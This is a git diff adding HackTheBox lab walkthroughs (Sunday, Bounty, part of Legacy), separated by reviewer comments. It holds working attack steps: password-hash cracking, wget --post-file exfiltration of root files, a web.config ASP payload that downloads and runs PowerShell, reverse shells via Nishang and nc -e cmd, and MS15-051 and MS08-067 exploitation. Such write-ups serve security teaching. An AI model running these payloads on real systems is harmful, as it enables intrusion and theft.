+ Connect Scan Timing: About 1.74% done; ETC: 06:07 (0:29:08 remaining)
+ Connect Scan Timing: About 3.72% done; ETC: 06:05 (0:26:17 remaining)
+ Connect Scan Timing: About 8.36% done; ETC: 06:04 (0:24:51 remaining)
+ Connect Scan Timing: About 12.54% done; ETC: 06:04 (0:23:29 remaining)
+ Connect Scan Timing: About 17.15% done; ETC: 06:04 (0:22:04 remaining)
+ Connect Scan Timing: About 21.93% done; ETC: 06:04 (0:20:43 remaining)
+ Connect Scan Timing: About 27.43% done; ETC: 06:04 (0:19:21 remaining)
+ Connect Scan Timing: About 32.63% done; ETC: 06:04 (0:18:00 remaining)
+ Connect Scan Timing: About 37.81% done; ETC: 06:04 (0:16:38 remaining)
+ **Discovered open port 22022/tcp on 10.10.10.76
+ Discovered open port 33890/tcp on 10.10.10.76**
+ Connect Scan Timing: About 43.04% done; ETC: 06:04 (0:15:15 remaining)
+ Connect Scan Timing: About 48.19% done; ETC: 06:04 (0:13:53 remaining)
+ Connect Scan Timing: About 53.48% done; ETC: 06:04 (0:12:33 remaining)
+
+
+We have found the 22022nd and 33890th port, let's run yet another scan on these two ports to discover what service they are hosting.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.76 -p 22022,33890
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-20 09:15 CET
+ Nmap scan report for 10.10.10.76
+ Host is up (0.085s latency).
+
+ PORT STATE SERVICE VERSION
+ **22022/tcp open ssh SunSSH 1.3 (protocol 2.0)**
+ 33890/tcp closed unknown
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 35.14 seconds
+
+
+Seems like we have a SSH port to work with ! it is running the SunSSH 1.3 protocol.
+we will also be looking at the 79th port : fingerd Solaris.
+
+## **Part 2 : Getting User Access**
+
+Let's see what we can do with the 79th port that is running fingerd Solaris. We will be running the finger enumeration script by pentestmonkey : http://pentestmonkey.net/tools/user-enumeration/finger-user-enum
+
+
+ λ root [ 10.10.14.48/23 ] [_HTB/Sunday/finger-user-enum-1.0] → perl finger-user-enum.pl -U rockyou.txt -t 10.10.10.76
+
+ ######## Scan started at Wed Nov 20 09:58:10 2019 #########
+ **sammy** @10.10.10.76: sammy pts/2 10.10.14.48
+ **sunny** @10.10.10.76: sunny pts/3 10.10.14.48
+
+
+We now have 2 users to work with ! sammy and sunny
+
+
+ λ root [ 10.10.14.48/23 ] [_HTB/Sunday/finger-user-enum-1.0] → **ssh sunny@10.10.10.76 -p 22022**
+ Unable to negotiate with 10.10.10.76 port 22022: no matching key exchange method found. Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,diffie-hellman-group-exchange-sha1,**diffie-hellman-group1-sha1**
+
+
+We need to allow a ssh key algorithm exchange method to the 10.10.10.76 host into our ~/.ssh/config file.
+
+
+ λ root [ 10.10.14.48/23 ] [_HTB/Sunday/finger-user-enum-1.0] → echo "**Host 10.10.10.76** " >> ~/.ssh/config
+
+ λ root [ 10.10.14.48/23 ] [_HTB/Sunday/finger-user-enum-1.0] → echo "**KexAlgorithms +diffie-hellman-group1-sha1** " >> ~/.ssh/config
+
+ λ root [ 10.10.14.48/23 ] [_HTB/Sunday/finger-user-enum-1.0] → **ssh sunny@10.10.10.76 -p 22022**
+ The authenticity of host '[10.10.10.76]:22022 ([10.10.10.76]:22022)' cant be established.
+ RSA key fingerprint is SHA256:TmRO9yKIj8Rr/KJIZFXEVswWZB/hic/jAHr78xGp+YU.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '[10.10.10.76]:22022' (RSA) to the list of known hosts.
+ Password:
+ Last login: Tue Apr 24 10:48:11 2018 from 10.10.14.4
+ Sun Microsystems Inc. **SunOS 5.11** snv_111b November 2008
+
+
+We see that the box is running SunOS 5.11, which is preety old, now we know why we needed to enable the old ssh algorithms for the client.
+
+
+ sunny@sunday:~$ cat /
+ cat: /: Is a directory
+ sunny@sunday:~$ CLEAR
+ -bash: CLEAR: command not found
+ sunny@sunday:~$
+ sunny@sunday:~$ cat /home/sunny/user.txt
+
+
+Here we see that the box is awfully slow and unresponsive.
+
+
+ sunny@sunday:~/Desktop$ cd /export/home/sammy
+ sunny@sunday:/export/home/sammy$ ls
+ Desktop Documents Downloads Public
+ sunny@sunday:/export/home/sammy$ cd Desktop
+ sunny@sunday:/export/home/sammy/Desktop$ ls
+ user.txt
+ sunny@sunday:/export/home/sammy/Desktop$ cat user.txt
+ cat: user.txt: Permission denied
+
+
+Navigating to /export/home/sammy/desktop we see that we do not have permissions to read user.txt Our next step is to try to print out /etc/passwd and /backup/shadow.backup
+
+
+ **sunny@sunday:/export/home/sammy/Desktop$ cat user.txt**
+ cat: user.txt: Permission denied
+
+ **sunny@sunday:/export/home/sammy/Desktop$ cat /etc/passwd**
+ root:x:0:0:Super-User:/root:/usr/bin/bash
+ daemon:x:1:1::/:
+ bin:x:2:2::/usr/bin:
+ sys:x:3:3::/:
+ adm:x:4:4:Admin:/var/adm:
+ lp:x:71:8:Line Printer Admin:/usr/spool/lp:
+ uucp:x:5:5:uucp Admin:/usr/lib/uucp:
+ nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
+ dladm:x:15:3:Datalink Admin:/:
+ smmsp:x:25:25:SendMail Message Submission Program:/:
+ listen:x:37:4:Network Admin:/usr/net/nls:
+ gdm:x:50:50:GDM Reserved UID:/:
+ zfssnap:x:51:12:ZFS Automatic Snapshots Reserved UID:/:/usr/bin/pfsh
+ xvm:x:60:60:xVM User:/:
+ mysql:x:70:70:MySQL Reserved UID:/:
+ openldap:x:75:75:OpenLDAP User:/:
+ webservd:x:80:80:WebServer Reserved UID:/:
+ postgres:x:90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh
+ svctag:x:95:12:Service Tag UID:/:
+ nobody:x:60001:60001:NFS Anonymous Access User:/:
+ noaccess:x:60002:60002:No Access User:/:
+ nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
+ sammy:x:101:10:sammy:/export/home/sammy:/bin/bash
+ sunny:x:65535:1:sunny:/export/home/sunny:/bin/bash
+
+ **sunny@sunday:/export/home/sammy/Desktop$ cat /backup/shadow.backup**
+ mysql:NP:::::::
+ openldap:*LK*:::::::
+ webservd:*LK*:::::::
+ postgres:NP:::::::
+ svctag:*LK*:6445::::::
+ nobody:*LK*:6445::::::
+ noaccess:*LK*:6445::::::
+ nobody4:*LK*:6445::::::
+ sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
+ sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
+
+
+Looking at the results we see that we have a few things to work with. we will be running the unshadow command onto the combination of the passwd.txt and shadow.txt files. First step is to save them locally, and we will run the command afterwards.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → cd _HTB
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB] → cd Sunday
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → nano passwd.txt
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → nano shadow.backup
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → ls
+ finger-user-enum-1.0 passwd.txt progress.graphml shadow.backup
+
+ **λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → unshadow passwd.txt shadow.backup**
+ Created directory: /home/nihilist/.john
+ root:x:0:0:Super-User:/root:/usr/bin/bash
+ daemon:x:1:1::/:
+ bin:x:2:2::/usr/bin:
+ sys:x:3:3::/:
+ adm:x:4:4:Admin:/var/adm:
+ lp:x:71:8:Line Printer Admin:/usr/spool/lp:
+ uucp:x:5:5:uucp Admin:/usr/lib/uucp:
+ nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
+ dladm:x:15:3:Datalink Admin:/:
+ smmsp:x:25:25:SendMail Message Submission Program:/:
+ listen:x:37:4:Network Admin:/usr/net/nls:
+ gdm:x:50:50:GDM Reserved UID:/:
+ zfssnap:x:51:12:ZFS Automatic Snapshots Reserved UID:/:/usr/bin/pfsh
+ xvm:x:60:60:xVM User:/:
+ mysql:NP:70:70:MySQL Reserved UID:/:
+ openldap:*LK*:75:75:OpenLDAP User:/:
+ webservd:*LK*:80:80:WebServer Reserved UID:/:
+ postgres:NP:90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh
+ svctag:*LK*:95:12:Service Tag UID:/:
+ nobody:*LK*:60001:60001:NFS Anonymous Access User:/:
+ noaccess:*LK*:60002:60002:No Access User:/:
+ nobody4:*LK*:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
+ sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:101:10:sammy:/export/home/sammy:/bin/bash
+ sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:65535:1:sunny:/export/home/sunny:/bin/bash
+
+ **λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → unshadow passwd.txt shadow.backup > john_pwd.txt
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → john john_pwd.txt --wordlist='/usr/share/wordlists/rockyou.txt'**
+
+
+We use the rockyou.txt wordlist in combination with the john command and we find the password "cooldude!" for the sammy user. Using that we try to log in through SSH once more but this time as the sammy user.
+
+
+ λ root [ 10.10.14.48/23 ] [_HTB/Sunday/finger-user-enum-1.0] → ssh sammy@10.10.10.76 -p 22022
+ Password:
+ Last login: Tue Apr 24 12:57:03 2018 from 10.10.14.4
+ Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
+ sammy@sunday:~$ ls
+ Desktop Documents Downloads Public
+ sammy@sunday:~$ cd Desktop
+ sammy@sunday:~/Desktop$ cat user.txt
+ **a3XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX**
+
+
+
+And we have been able to ssh as the sammy user ! We have finally been able to reveal the user flag.
+
+## **Part 3 : Getting Root Access**
+
+First of all we run the sudo -l command to see what we can work with.
+
+
+ sammy@sunday:~/Desktop$ sudo -l
+ User sammy may run the following commands on this host:
+ **(root) NOPASSWD: /usr/bin/wget**
+
+
+Interesting ! We seem to be able to run the wget command as root without any password. Let's run the command netcat command on a second terminal , and we will attempt to print out the root flag using wget's --post-file flag.
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → nc -lvnp **9001**
+
+
+_Terminal 1:_
+
+
+ sammy@sunday:~/Desktop$ **sudo wget --post-file=/root/root.txt 10.10.14.48:9001**
+ --08:49:44-- http://10.10.14.48:9001/
+ => `index.html'
+ Connecting to 10.10.14.48:9001... connected.
+ HTTP request sent, awaiting response...
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → **nc -lvnp 9001**
+ Connection from 10.10.10.76:48117
+ POST / HTTP/1.0
+ User-Agent: Wget/1.10.2
+ Accept:
+ Host: 10.10.14.48:9001
+ Connection: Keep-Alive
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 33
+
+ **fbXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX**
+
+
+And that's it ! We have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
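Review bot: the step that yields sunny's password is missing. After `sunny @10.10.10.76: sunny pts/3 10.10.14.48` the writeup jumps straight to `ssh sunny@10.10.10.76 -p 22022` and a `Password:` prompt that succeeds, but never states how that credential was obtained (guess, wordlist, or otherwise); add that step before claiming user access. Likewise `cat /backup/shadow.backup` is announced without showing how `/backup` was found (an `ls /` or `find` would do), and the john run is shown without its output, so `cooldude!` appears from nowhere. Two smaller points: `Seems like we have alot of ports to work with` is not supported by the scan, which lists only 79 and 111 as `open`; the rest are `filtered`, which is noise rather than attack surface. The two `echo ... >> ~/.ssh/config` lines work, but it is worth saying that `KexAlgorithms` must sit under the `Host 10.10.10.76` line to stay scoped to this target, because `diffie-hellman-group1-sha1` is a weak 1024-bit group that OpenSSH disabled by default and should not be re-enabled globally. Finally, `sudo wget --post-file=/root/root.txt 10.10.14.48:9001` only exfiltrates one file; with `(root) NOPASSWD: /usr/bin/wget` the same binary can also write files as root via `-O` (for example a modified `/etc/passwd` or `/etc/sudoers`), which is the actual root shell the heading `Getting Root Access` promises, so either show that or retitle the section as reading the root flag.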
diff --git a/Easy/19.md b/Easy/19.md
new file mode 100644
index 0000000..350eb6d
--- /dev/null
+++ b/Easy/19.md
@@ -0,0 +1,389 @@
+# Bounty Writeup
+
+
+
+## Introduction :
+
+Bounty is an easy Windows box that was released back in June 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 93.22.134.89 ] [~] → nmap -sC -sV 10.10.10.93
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:23 CET
+ Nmap scan report for 10.10.10.93
+ Host is up (0.095s latency).
+ Not shown: 999 filtered ports
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Microsoft IIS httpd 7.5
+ | http-methods:
+ |_ Potentially risky methods: TRACE
+ |_http-server-header: Microsoft-IIS/7.5
+ |_http-title: Bounty
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 20.16 seconds
+
+
+## **Part 2 : Getting User Access**
+
+It seems like our nmap scan found the 80th port opened, we will run a gobuster scan in order to enumerate the directories we will be able to work with.
+
+
+ λ nihilist [ 93.22.134.89 ] [~] → gobuster -u http://10.10.10.93/ -w /usr/share/wordlists/directory-list-2.3-medium.txt
+
+
+ =====================================================
+ Gobuster v2.0.0 OJ Reeves (@TheColonial)
+ =====================================================
+ [+] Mode : dir
+ [+] Url/Domain : http://10.10.10.93/
+ [+] Threads : 50
+ [+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ [+] Status codes : 200,204,301,302,307,403
+ [+] Extensions : aspx
+ [+] Timeout : 10s
+ =====================================================
+ 2019/11/25 08:28:36 Starting gobuster
+ =====================================================
+ /transfer.aspx (Status: 200)
+ /uploadedFiles (Status: 301)
+
+
+Gobuster seems to have found 2 interesting pages : -/transfer.aspx (which returns a status 200) -/uploadedfiles (which returns a status 301)
+
+ 
+
+Searching for the keywords **"IIS 7.5 RCE"** , the results tell us that we should be able to upload a file **web.config**
+
+We will submit our script to the website and ready our terminal running the command nc with the -lvnp flags in order to catch the incoming connection to our 9001 port.
+
+_web.config:_
+
+
+ <****?xml version="1.0" encoding="UTF-8"?> <****configuration> <****system.webServer> <****handlers accessPolicy="Read, Script, Write"> <****add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> <****/handlers> <****security> <****requestFiltering> <****fileExtensions> <****remove fileExtension=".config" /> <****hiddenSegments> <****/fileExtensions> <****remove segment="web.config" /> <****/hiddenSegments> <****/requestFiltering> <****/security> <****/system.webServer> <****/configuration> <****%@ Language=VBScript %> <****%
+ Set s = CreateObject("WScript.Shell")
+ Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('ht>
+ o = cmd.StdOut.Readall()
+ Response.write(o)
+ %****>****
+
+Our nihilist.ps1 script is a copy of Nishang's [Invoke-PowerShellTcp.ps1](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1)
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bounty] → curl -sk https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 > nihilist.ps1
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bounty] → echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.48 -Port 9001' >> nihilist.ps1
+
+
+As it is written above, our nihilist.ps1 script will attempt to send a reverse shell connection to our machine at the of 10.10.14.48 adress, onto it's 9001st port. So we will ready our terminal with the nc command and it's -lvnp flags in order to catch the incoming connection.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bounty] → nc -lvnp 9001
+
+
+We submit our web.config file
+
+
+
+We then browse to it, and then we wait for the reverse shell to come back to our terminal.
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
+ → python2 -m SimpleHTTPServer
+ Serving HTTP on 0.0.0.0 port 8000 ...
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
+ → nc -lvnp 9001
+
+
+_Terminal 3:_
+
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
+ → curl -vsk http://10.10.10.93/UploadedFiles/web.config
+ * Trying 10.10.10.93:80...
+ * TCP_NODELAY set
+ * Connected to 10.10.10.93 (10.10.10.93) port 80 (#0)
+ > GET /UploadedFiles/web.config HTTP/1.1
+ > Host: 10.10.10.93
+ > User-Agent: curl/7.67.0
+ > Accept: */*
+ >
+
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
+ → python2 -m SimpleHTTPServer
+ Serving HTTP on 0.0.0.0 port 8000 ...
+ 10.10.10.93 - - [02/Dec/2019 08:22:36] "GET /nihilist.ps1 HTTP/1.1" 200 -
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
+ → nc -lvnp 9001
+ Connection from 10.10.10.93:49158
+ Windows PowerShell running as user BOUNTY$ on BOUNTY
+ Copyright (C) 2015 Microsoft Corporation. All rights reserved.
+
+ PS C:\windows\system32\inetsrv>
+
+ PS C:\windows\system32\inetsrv> whoami
+ bounty\merlin
+
+
+And we're in ! we are logged in as the user merlin, now let's grab the user flag located in C:\users\merlin\desktop
+
+
+
+
+ PS C:\windows\system32\inetsrv> cd ../../..
+ PS C:\> ls
+
+
+ Directory: C:\
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d---- 5/30/2018 4:14 AM inetpub
+ d---- 7/14/2009 6:20 AM PerfLogs
+ d-r-- 6/10/2018 3:43 PM Program Files
+ d-r-- 7/14/2009 8:06 AM Program Files (x86)
+ d-r-- 5/31/2018 12:18 AM Users
+ d---- 5/31/2018 11:37 AM Windows
+
+
+ PS C:\> cd Users\Merlin
+ PS C:\Users\Merlin> cd Desktop
+ PS C:\Users\Merlin\Desktop> more user.txt
+ e2XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Part 3 : Getting Root Access**
+
+In order to escalate privileges from merlin to the SYSTEM user, we need to first look at the results of the systeminfo command.
+
+_Terminal 1:_
+
+
+ PS C:\Users> systeminfo
+
+ Host Name: BOUNTY
+ OS Name: Microsoft Windows Server 2008 R2 Datacenter
+ OS Version: 6.1.7600 N/A Build 7600
+ OS Manufacturer: Microsoft Corporation
+ OS Configuration: Standalone Server
+ OS Build Type: Multiprocessor Free
+ Registered Owner: Windows User
+ Registered Organization:
+ Product ID: 55041-402-3606965-84760
+ Original Install Date: 5/30/2018, 12:22:24 AM
+ System Boot Time: 12/2/2019, 8:56:08 AM
+ System Manufacturer: VMware, Inc.
+ System Model: VMware Virtual Platform
+ System Type: x64-based PC
+ Processor(s): 1 Processor(s) Installed.
+ [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
+ Windows Directory: C:\Windows
+ System Directory: C:\Windows\system32
+ Boot Device: \Device\HarddiskVolume1
+ System Locale: en-us;English (United States)
+ Input Locale: en-us;English (United States)
+ Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
+ Total Physical Memory: 2,047 MB
+ Available Physical Memory: 1,588 MB
+ Virtual Memory: Max Size: 4,095 MB
+ Virtual Memory: Available: 3,595 MB
+ Virtual Memory: In Use: 500 MB
+ Page File Location(s): C:\pagefile.sys
+ Domain: WORKGROUP
+ Logon Server: N/A
+ Hotfix(s): N/A
+ Network Card(s): 1 NIC(s) Installed.
+ [01]: Intel(R) PRO/1000 MT Network Connection
+ Connection Name: Local Area Connection
+ DHCP Enabled: No
+ IP address(es)
+ [01]: 10.10.10.93
+
+
+
+We see that there are no Hotfixes onto the machine, which indicates a serious security flaw. So we will attempt to escalate privileges using the MS15-051. we will not forget that we will be applying a privilege escalation binary onto a 64 bit machine.
+
+Download from https://eternallybored.org/misc/netcat/
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
+ → wget https://github.com/euphrat1ca/ms15-051/raw/master/ms15-051/ms15-051/x64/ms15-051.exe
+ --2019-12-02 09:07:00-- https://github.com/euphrat1ca/ms15-051/raw/master/ms15-051/ms15-051/x64/ms15-051.exe
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.118.3
+ Connecting to github.com (github.com)|140.82.118.3|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/euphrat1ca/ms15-051/master/ms15-051/ms15-051/x64/ms15-051.exe [following]
+ --2019-12-02 09:07:00-- https://raw.githubusercontent.com/euphrat1ca/ms15-051/master/ms15-051/ms15-051/x64/ms15-051.exe
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.120.133
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.120.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 55296 (54K) [application/octet-stream]
+ Saving to: ‘ms15-051.exe’
+
+ ms15-051.exe 100%[===============================>] 54.00K --.-KB/s in 0.06s
+
+ 2019-12-02 09:07:01 (852 KB/s) - ‘ms15-051.exe’ saved [55296/55296]
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
+ → python2 -m SimpleHTTPServer
+ Serving HTTP on 0.0.0.0 port 8000 ...
+
+
+
+Now we just need to download both the ms15-051.exe and nc.exe binary onto our local machine, at the IP 10.10.14.48 at the 8000th port.
+
+_Terminal 1:_
+
+
+ PS C:\Users> certutil -urlcache -f http://10.10.14.48:8000/ms15-051.exe nihilist_privesc.exe
+ **** Online ****
+ CertUtil: -URLCache command FAILED: 0x80070005 (WIN32: 5)
+ CertUtil: Access is denied.
+
+
+Let's not forget to download it onto the machine within a folder where we have the write rights.
+
+
+ PS C:\Users> cd ..
+ PS C:\> cd Windows
+ PS C:\Windows> cd temp
+
+
+Now we should be able to download our 2 binaries
+
+
+ PS C:\Windows\temp> certutil -urlcache -f http://10.10.14.48:8000/ms15-051.exe nihilist_privesc.exe
+ **** Online ****
+ CertUtil: -URLCache command completed successfully.
+
+
+
+ PS C:\windows\temp> certutil -urlcache -f http://10.10.14.48:8000/nc64.exe nc64.exe
+ **** Online ****
+ CertUtil: -URLCache command completed successfully.
+
+
+Our binaries got uploaded ! now before we execute it we will ready our reverse shell terminal with the same nc command to catch the incoming connection.
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
+ → nc -lvnp 9999
+
+
+_Terminal 1:_
+
+
+ PS C:\windows\temp> certutil -urlcache -f http://10.10.14.48:8000/nc64.exe nc64.exe
+ **** Online ****
+ CertUtil: -URLCache command completed successfully.
+ PS C:\windows\temp> ls
+
+
+ Directory: C:\windows\temp
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d---- 6/10/2018 3:44 PM vmware-SYSTEM
+ -a--- 5/30/2018 3:19 AM 0 DMI5FAC.tmp
+ -a--- 12/2/2019 10:12 AM 55296 nihilist_privesc.exe
+ -a--- 12/2/2019 11:02 AM 43696 nc64.exe
+ -a--- 6/10/2018 3:44 PM 203777 vminst.log
+ -a--- 12/2/2019 8:56 AM 57269 vmware-vmsvc.log
+ -a--- 6/11/2018 12:47 AM 22447 vmware-vmusr.log
+ -a--- 12/2/2019 8:56 AM 910 vmware-vmvss.log
+
+
+ PS C:\windows\temp> ./nihilist_privesc.exe "c:\windows\temp\nc64.exe -e cmd 10.10.14.48 9999"
+
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
+ → nc -lvnp 9999
+
+ Connection from 10.10.10.93:49189
+ Microsoft Windows [Version 6.1.7600]
+ Copyright (c) 2009 Microsoft Corporation. All rights reserved.
+
+
+ C:\windows\temp>whoami
+ whoami
+ nt authority\system
+
+ C:\windows\temp>cd ..
+ cd ..
+
+ C:\Windows>cd ..
+ cd ..
+
+ C:\>cd Users
+ cd Users
+
+ C:\Users>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 5084-30B0
+
+ Directory of C:\Users
+
+ 05/30/2018 11:18 PM <****DIR> .
+ 05/30/2018 11:18 PM <****DIR> ..
+ 05/30/2018 11:18 PM <****DIR> Administrator
+ 05/30/2018 03:44 AM <****DIR> Classic .NET AppPool
+ 05/29/2018 11:22 PM <****DIR> merlin
+ 05/30/2018 04:44 AM <****DIR> Public
+ 0 File(s) 0 bytes
+ 6 Dir(s) 11,884,384,256 bytes free
+
+ C:\Users>cd Administrator
+ cd Administrator
+
+ C:\Users\Administrator>cd Desktop
+ cd Desktop
+
+ C:\Users\Administrator\Desktop>type root.txt
+ type root.txt
+ c8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+And that's it ! we have been able to get a root shell onto the box and we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
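Review bot: the `web.config` payload as pasted is not well-formed XML and IIS would answer with a configuration error (HTTP 500) instead of executing it. The sequence `<remove fileExtension=".config" /> <hiddenSegments> </fileExtensions> <remove segment="web.config" /> </hiddenSegments>` opens `hiddenSegments` inside `fileExtensions` and then closes `fileExtensions` first; the `</fileExtensions>` has to come before `<hiddenSegments>`. The `s.Exec(...)` line is also cut off at `downloadstring('ht>`, so the URL of `nihilist.ps1` is lost and the payload cannot be reproduced from the page; the SimpleHTTPServer log later shows `GET /nihilist.ps1` on port 8000, so the full line can be restored from that. The `<****` and `%****>` runs are bold markers leaking into the XML and should be removed. Two wording problems in Part 3: `Now we just need to download both the ms15-051.exe and nc.exe binary onto our local machine` reverses the direction (the binaries are fetched from our machine onto the target with `certutil`), and the lone `Download from https://eternallybored.org/misc/netcat/` line has no sentence attached; say that it is the source of `nc64.exe`. Lastly, `./nihilist_privesc.exe` is a pre-built binary pulled from a third-party GitHub mirror and run to obtain SYSTEM; a sentence on verifying it (checking its hash against the original release or building from published source) belongs next to the `wget` that fetches it.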
diff --git a/Easy/2.md b/Easy/2.md
new file mode 100644
index 0000000..f8dbca2
--- /dev/null
+++ b/Easy/2.md
@@ -0,0 +1,139 @@
+# Legacy Writeup
+
+
+
+## Introduction :
+
+Legacy is an easy Windows box released back in March 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ root [/home/nihilist] → nmap -sC -sV 10.10.10.4
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-08 22:10 CET
+ Nmap scan report for 10.10.10.4
+ Host is up (0.044s latency).
+ Not shown: 997 filtered ports
+ PORT STATE SERVICE VERSION
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 445/tcp open microsoft-ds Windows XP microsoft-ds
+ 3389/tcp closed ms-wbt-server
+ Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
+
+ Host script results:
+ |_clock-skew: mean: 5d00h59m39s, deviation: 1h24m50s, median: 4d23h59m39s
+ |_nbstat: NetBIOS name: LEGACY, NetBIOS user: , NetBIOS MAC: 00:50:56:b9:25:bd (VMware)
+ | smb-os-discovery:
+ | OS: Windows XP (Windows 2000 LAN Manager)
+ | OS CPE: cpe:/o:microsoft:windows_xp::-
+ | Computer name: legacy
+ | NetBIOS computer name: LEGACY\x00
+ | Workgroup: HTB\x00
+ |_ System time: 2019-11-14T01:10:09+02:00
+ | smb-security-mode:
+ | account_used: guest
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: disabled (dangerous, but default)
+ |_smb2-time: Protocol negotiation failed (SMB2)
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 63.05 seconds
+
+
+Here we can see that the port 139, 445, and 3389 are opened. We will take a closer look at the port****running the service****.
+
+## **Part 2 : Getting Access**
+
+It is highly likely that the machine is vulnerable to MS08-067 RCE so we will test it with the according metasploit module.
+
+
+ msf5 > search ms08
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 auxiliary/admin/ms/ms08_059_his2006 2008-10-14 normal No Microsoft Host Integration Server 2006 Command Execution Vulnerability
+ 1 auxiliary/fileformat/multidrop normal No Windows SMB Multi Dropper
+ 2 exploit/windows/browser/ms08_041_snapshotviewer 2008-07-07 excellent No Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download
